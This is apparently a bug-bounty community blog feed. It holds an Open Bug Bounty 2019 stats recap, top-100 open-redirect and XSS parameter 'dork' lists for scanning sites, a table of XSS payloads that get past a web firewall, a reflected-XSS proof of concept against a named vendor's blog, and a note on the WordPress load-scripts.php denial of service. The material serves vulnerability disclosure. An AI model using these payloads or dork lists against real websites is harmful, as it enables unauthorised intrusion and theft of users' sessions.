Brief Recap of Open Bug Bounty’s Record Growth in 2019

Dear Researchers and Website Owners,

First of all, we wish you a Happy and Secure New Year 2020:

With almost half-a-million vulnerability reports today, we are happy to present you a brief recap of our relentless and steady growth in 2019 attained with your valuable support and contribution that we greatly appreciate:

  • 203,449 security vulnerabilities were reported in total (500 per day), being a 32% yearly grow

  • 101,931 vulnerabilities were fixed by website owners, likewise showing a 30% growth compared to the previous year

  • 5,832 new security researchers joined the community, making the total number of researchers and security experts 13,532

  • 383 new bug bounty programs were created by website owners, now offering 657 programs in total with over 1342 websites to test

Best security researchers and top-rated Bug Bounty programs are available on the main page of our website, where we recently refreshed the design.

In 2020, we plan to introduce new features requested by the researchers and website owners to further improve their experience, accelerate smooth communications and reduce vulnerability remediation time.

New DevSecOps vulnerability data export options are also coming soon to facilitate crowd security testing integration with corporate CI/CD and DevSecOps strategy.

We are receiving a considerable number of incoming proposals from commercial companies to support the project, or even to merge with their own solutions and platforms. We may consider one or even several partnerships in 2020 to ensure even a faster development of our project, however, the Open Bug Bounty will always remain open, community-driven and free.

Please don’t hesitate to promote our project among you contacts and on social networks!

Thank you for making Web a safer place with us!

Top 100 Open Redirect dorks


Just like previous list of XSS dorks but this time for Open Redirect vulnerabilities.

First with most common parameters then parameters along with path.

page 19.3%
url 13.1%
ret 10.0%
r2 9.8%
img 7.0%
u 4.4%
return 2.6%
r 2.6%
URL 2.4%
next 2.0%
redirect 2.0%
redirectBack 1.6%
AuthState 1.2%
referer 0.8%
redir 0.8%
l 0.8%
aspxerrorpath 0.6%
image_path 0.6%
ActionCodeURL 0.6%
return_url 0.6%
link 0.6%
q 0.6%
location 0.6%
ReturnUrl 0.6%
uri 0.4%
referrer 0.4%
returnUrl 0.4%
forward 0.4%
file 0.4%
rb 0.4%
end_display 0.4%
urlact 0.4%
from 0.4%
goto 0.4%
path 0.4%
redirect_url 0.4%
old 0.4%
pathlocation 0.2%
successTarget 0.2%
returnURL 0.2%
urlsito 0.2%
newurl 0.2%
Url 0.2%
back 0.2%
retour 0.2%
odkazujuca_linka 0.2%
r_link 0.2%
cur_url 0.2%
H_name 0.2%
ref 0.2%
topic 0.2%
resource 0.2%
returnTo 0.2%
home 0.2%
node 0.2%
sUrl 0.2%
href 0.2%
linkurl 0.2%
returnto 0.2%
redirecturl 0.2%
SL 0.2%
st 0.2%
errorUrl 0.2%
media 0.2%
destination 0.2%
targeturl 0.2%
return_to 0.2%
cancel_url 0.2%
doc 0.2%
GO 0.2%
ReturnTo 0.2%
anything 0.2%
FileName 0.2%
logoutRedirectURL 0.2%
list 0.2%
startUrl 0.2%
service 0.2%
redirect_to 0.2%
end_url 0.2%
_next 0.2%
noSuchEntryRedirect 0.2%
context 0.2%
returnurl 0.2%
ref_url 0.2%
/?page= 18.5
/index.php?ret= 10.0
/analytics/hit.php?r2= 9.8
/api/thumbnail?img= 7.0
/e.html?u= 3.2
/actions/act_continueapplication.cfm?r= 2.4
/redirect2/?url= 2.0
/Shibboleth.sso/Logout?return= 1.2
/ui/clear-selected/?next= 1.2
/Home/Redirect?url= 1.2
/jobs/?l= 0.8
/Error.aspx?aspxerrorpath= 0.6
/r.php?u= 0.6
/services/logo_handler.ashx?image_path= 0.6
/AddProduct.aspx?ActionCodeURL= 0.6
/tools/login/default.asp?page= 0.6
/spip.php?url= 0.6
/usermanagement/mailGeneratedPassword?referer= 0.6
/?return= 0.6
/?redir= 0.6
/simplesaml/module.php/core/loginuserpass.php?AuthState= 0.6
/out.php?url= 0.6
/affiche.php?uri= 0.4
/redirector.php?url= 0.4
/cgi/set_lang?referrer= 0.4
/blog/click?url= 0.4
/site.php?url= 0.4
/download2.php?file= 0.4
/jump.php?url= 0.4
/redirect/?redirect= 0.4
/admin/track/track?redirect= 0.4
/switch.php?rb= 0.4
/php-scripts/form-handler.php?end_display= 0.4
/cg/rk/?url= 0.4
/tosite.php?url= 0.4
/cambioidioma.php?urlact= 0.4
/accueil/spip.php?url= 0.4
/IRB/sd/Rooms/RoomComponents/LoginView/GetSessionAndBack?redirectBack= 0.4
/search?q= 0.4
/default.aspx?URL= 0.4
/initiate-sso-login/?redirect_url= 0.4
/module.php/core/loginuserpass.php?AuthState= 0.4
/authentication/check_login?old= 0.4
/RedirectToDoc.aspx?URL= 0.4
/shop/bannerhit.php?url= 0.4
/acceptcookies/?ReturnUrl= 0.4
/index.php?url= 0.4
/publang?url= 0.2
/home/helperpage?url= 0.2
/widgets.aspx?url= 0.2
/_lang/en?next= 0.2
/application/en?url= 0.2
/common/topcorm.do?pathlocation= 0.2
/main/action?successTarget= 0.2
/Videos/SetCulture?returnURL= 0.2
/Localize/ChangeLang?returnUrl= 0.2
/_goToSite.asp?urlsito= 0.2
/redir?url= 0.2
/admin/auth/logined?redirect= 0.2
/linkforward?forward= 0.2
/modules/babel/redirect.php?newurl= 0.2
/umbraco/Surface/LanguageSurface/ChangeLanguage?Url= 0.2
/langswitcher.php?url= 0.2
/redirect/?url= 0.2
/i18n/i18n_user_currencies/change_currency?back= 0.2
/accessibilite/textBackUp/?retour= 0.2
/fncBox.php?url= 0.2
/all4shop-akcie.php?odkazujuca_linka= 0.2
/openurl.php?url= 0.2
/te3/out.php?u= 0.2
/utils/set_language.html?return_url= 0.2
/trigger.php?r_link= 0.2
/home/lng?cur_url= 0.2
/goto?url= 0.2
/o.php?url= 0.2
/link-master/19/follow?link= 0.2
/hack.php?H_name= 0.2
/bmad/namhoc.php?return= 0.2
/maven/stats.asp?ref= 0.2
/Main/WebHome?topic= 0.2
/bin/fusion/imsLogin?resource= 0.2
/languechange.aspx?url= 0.2
/bloques/bannerclick.php?url= 0.2
/changesiteversion-full?referer= 0.2
/out.php?link= 0.2
/bgpage?r= 0.2
/signout?returnTo= 0.2
/switch_lang.php?return_url= 0.2
/nousername.php?redir= 0.2
/i/logout?return= 0.2
/util_goto_detail_home.cfm?home= 0.2
/misc/oldmenu.html?from= 0.2
/click.php?url= 0.2
/bitrix/rdc/?goto= 0.2
/?node= 0.2
/setLanguage.php?return= 0.2
/redirect/ad?url= 0.2
/redirect.php?sUrl= 0.2
/redirect?url= 0.2
/url?url= 0.2

XSS WAF Bypassed

</script><svg onload=alert(1)> = (Error)
</script><!–><svg onload%3Da%3Dalert,b%3D1,[b].find(a)> = (OK)

</script><svg onload=alert(1)> = (Error)
</script/<K><svg onload%3Da%3Dalert,b%3D1,[b].find%26rpar;a%26%2341;> = (OK)

<a href=”javascript:alert(1)”>href</a> = (Error)
<A aAaAaAa AaAaAaA aAaA hReF%3D”%26%2301j%26%2365;v%26%2365;s%26%2399rIpT%26colon;[1].find%26lpar;al\u0%26%2348;65rt%26%2341;”>href</a> = (OK)

<input value=”testtest” onclick=”alert(1)”> = (Error)
<form><input formaction=javascript:alert(1) type=submit value=click> = (OK)

<img src=x onerror=alert(1)> = (Error)
<img src=x:alert(alt) onerror=eval(src) alt=1> = (OK)

‘-confirm(1)-‘ = (Error)
<!’/!”/\’/\”/*/-top[`con\x66irm`]`1`//><svg> = (OK)

<img src=x onerror=alert(1)> = (Error)
<img src onerror=%26emsp;prompt`${1}`> = (OK)

Thank’s You, And best regards!!!

Youtube : https://www.youtube.com/channel/UCyVj0erForx8gUDNAp8wzLw
Facebook : https://www.facebook.com/b4c0d
Gmail : [email protected]
Paypal : paypal.me/Rando784

Top 100 XSS dorks

It’s the end of the year and a good time to share things with people.

After having scanned more than a million websites in order to find XSS and Open Redirect vulnerabilities, I took the time to do statistics on the most vulnerables parameters.

It can be used as a powerful dork list so let’s update your scanners and get bounties!

First here is the list of most vulnerable parameters along with their frequency.

Dork Frequency
q 5.5%
s 4.5%
search 1.9%
id 1.7%
lang 1.4%
keyword 1.2%
query 1.1%
page 1.0%
keywords 0.8%
year 0.8%
view 0.8%
email 0.8%
type 0.7%
name 0.7%
p 0.7%
month 0.6%
immagine 0.6%
list_type 0.5%
url 0.5%
terms 0.5%
categoryid 0.5%
key 0.5%
l 0.5%
begindate 0.4%
enddate 0.4%
categoryid2 0.4%
t 0.4%
cat 0.4%
category 0.4%
action 0.4%
bukva 0.4%
redirect_uri 0.4%
firstname 0.4%
c 0.4%
lastname 0.3%
uid 0.3%
startTime 0.3%
eventSearch 0.3%
categoryids2 0.3%
categoryids 0.3%
sort 0.3%
positiontitle 0.3%
groupid 0.3%
m 0.3%
message 0.3%
tag 0.3%
pn 0.3%
title 0.3%
orgId 0.3%
text 0.3%
handler 0.2%
myord 0.2%
myshownums 0.2%
id_site 0.2%
city 0.2%
search_query 0.2%
msg 0.2%
sortby 0.2%
produkti_po_cena 0.2%
produkti_po_ime 0.2%
mode 0.2%
CODE 0.2%
location 0.2%
v 0.2%
order 0.2%
n 0.2%
term 0.2%
start 0.2%
k 0.2%
redirect 0.2%
ref 0.2%
file 0.2%
mebel_id 0.2%
country 0.2%
from 0.1%
r 0.1%
f 0.1%
field%5B%5D 0.1%
searchScope 0.1%
state 0.1%
phone 0.1%
Itemid 0.1%
lng 0.1%
place 0.1%
bedrooms 0.1%
expand 0.1%
e 0.1%
price 0.1%
d 0.1%
path 0.1%
address 0.1%
day 0.1%
display 0.1%
a 0.1%
error 0.1%
form 0.1%
language 0.1%
mls 0.1%
kw 0.1%
u 0.1%

This second list is almost the same but with corresponding path :

Dork Frequency
/?s= 3.6
/search?q= 2.5
/index.php?lang= 0.6
/pplay/info_prenotazioni.asp?immagine= 0.6
/shared/lgflsearch.php?terms= 0.5
/index.php?page= 0.4
/search?query= 0.4
/en/Telefon-Cam?search= 0.4
/index.php?bukva= 0.4
/pro/events_print_setup.cfm?list_type= 0.3
/pro/events_print_setup.cfm?categoryid= 0.3
/pro/events_print_setup.cfm?categoryid2= 0.3
/?eventSearch= 0.3
/?startTime= 0.3
/pro/events_ical.cfm?categoryids= 0.3
/pro/events_ical.cfm?categoryids2= 0.3
/pro/events_print_setup.cfm?month= 0.3
/pro/events_print_setup.cfm?year= 0.3
/pro/events_print_setup.cfm?begindate= 0.3
/pro/events_print_setup.cfm?enddate= 0.3
/search?keyword= 0.3
/?q= 0.3
/search/?q= 0.3
/index.php?pn= 0.3
/?lang= 0.3
/property/search?uid= 0.3
/index.php?id= 0.3
/search?orgId= 0.3
/products?handler= 0.2
/pro/events_print_setup.cfm?view= 0.2
/pro/events_print_setup.cfm?keywords= 0.2
/?p= 0.2
/search.php?q= 0.2
/?search= 0.2
/pro/minicalendar_detail.cfm?list_type= 0.2
/index.php?produkti_po_cena= 0.2
/index.php?produkti_po_ime= 0.2
/servlet/com.jsbsoft.jtf.core.SG?CODE= 0.2
/login?redirect_uri= 0.2
/connexion?redirect_uri= 0.2
/index.php?action= 0.2
/plugins/actu/listing_actus-front.php?id_site= 0.2
/index.php?mebel_id= 0.2
/search/?search= 0.2
/news/class/index.php?myshownums= 0.2
/news/class/index.php?myord= 0.2
/search.html?searchScope= 0.1
/search?field%5B%5D= 0.1
/videos?tag= 0.1
/videos?place= 0.1
/videos?search= 0.1
/?email= 0.1
/?cat= 0.1
/content.php?expand= 0.1
/?page= 0.1
/search/?s= 0.1
/?keywords= 0.1
/search/?keyword= 0.1
/apps/email/index.jsp?n= 0.1
/?name= 0.1
/?sort= 0.1
/search?search= 0.1
/pro/minicalendar_print_setup.cfm?begindate= 0.1
/pro/minicalendar_print_setup.cfm?enddate= 0.1
/pro/minicalendar_print_setup.cfm?keywords= 0.1
/search-results?q= 0.1
/?listingtypeid= 0.1
/search?s= 0.1
/pro/minicalendar_print_setup.cfm?categoryid2= 0.1
/?bathrooms= 0.1
/?listingagent= 0.1
/?featuredsearchseourl= 0.1
/?squarefeet= 0.1
/?siteid= 0.1
/?bedrooms= 0.1
/?featuredsearch= 0.1
/?price= 0.1
/?maxbuilt= 0.1
/?lsid= 0.1
/?listingtypes= 0.1
/?garages= 0.1
/?maxprice= 0.1
/?minprice= 0.1
/?keywordsany= 0.1
/?yearbuilt= 0.1
/?minbuilt= 0.1
/?subdivision= 0.1
/?lotsizeval= 0.1
/?listingstatusid= 0.1
/?mls= 0.1
/firms/?text= 0.1
/servlet/com.jsbsoft.jtf.core.SG?OBJET= 0.1
/plan_du_site.php?lang= 0.1
/index.php?Itemid= 0.1
/?view= 0.1
/?t= 0.1
/?selat= 0.1
/?selong= 0.1
/?nwlat= 0.1
/?geo= 0.1

I hope you enjoy this 🙂

Congrats on 1000 badges OBB

Wanted to start my blogg by celebrating 1000 combined honor badges by OBB community! 🙂

hip hip horray!

Awesome job made by the community, if only the site owners could take submitted findings more seriously! Personally I find that a lot of alerted siteowners just seem to throw the information provided in their garbage, and it makes me sad.

Good luck next year everyone! may the hunt be bountiful!

-m00n

Reflected xss in 360totalsecurity

i have found vulnerability in 360totalsecurity ,is Reflected XSS in https://blog.360totalsecurity.com

Steps to reproduce :

Go to https://blog.360totalsecurity.com

and To : https://blog.360totalsecurity.com/en/safe-tips-for-wannacry-ransomware-attack/?utm_campaign=WannaCry_tips&utm_content=360.NSA.defense.tool&utm_medium=text_link&utm_source=Blog

and replace utm_source value by this XSS payload : x”><svG onLoad=prompt(document.domain)>

Line: <a href=”https://blog.360totalsecurity.com/en?utm_source=x“><svG onLoad=prompt(document.domain)>

Poc:

https://blog.360totalsecurity.com/en/safe-tips-for-wannacry-ransomware-attack/?utm_campaign=WannaCry_tips&utm_content=360.NSA.defense.tool&utm_medium=text_link&utm_source=x“><svG onLoad=prompt(document.domain)>

Regards,

TAHA

Denial of Service vulnerability in script-loader.php (CVE-2018-6389)

The load-scripts.php file receives a parameter called load[], the parameter value is ‘jquery-ui-core’. In the response, I received the JS module ‘jQuery UI Core’ that was requested

  What can be concluded from this URL, is that it is probably meant to supply users with some JS modules. In addition, the load[] parameter is an array, which means that it is possible to provide multiple values and be able to get multiple JS modules within the response.

   I wondered what would happen if I sent the server a request to supply me every JS module that it stored? A single request would cause the server to perform 181 I/O actions and provide the file contents in the response.

So I tried it, I sent the request to the server:

The server responded after 2.2 seconds, with almost 4MB of data, which made the server work really hard to process such a request.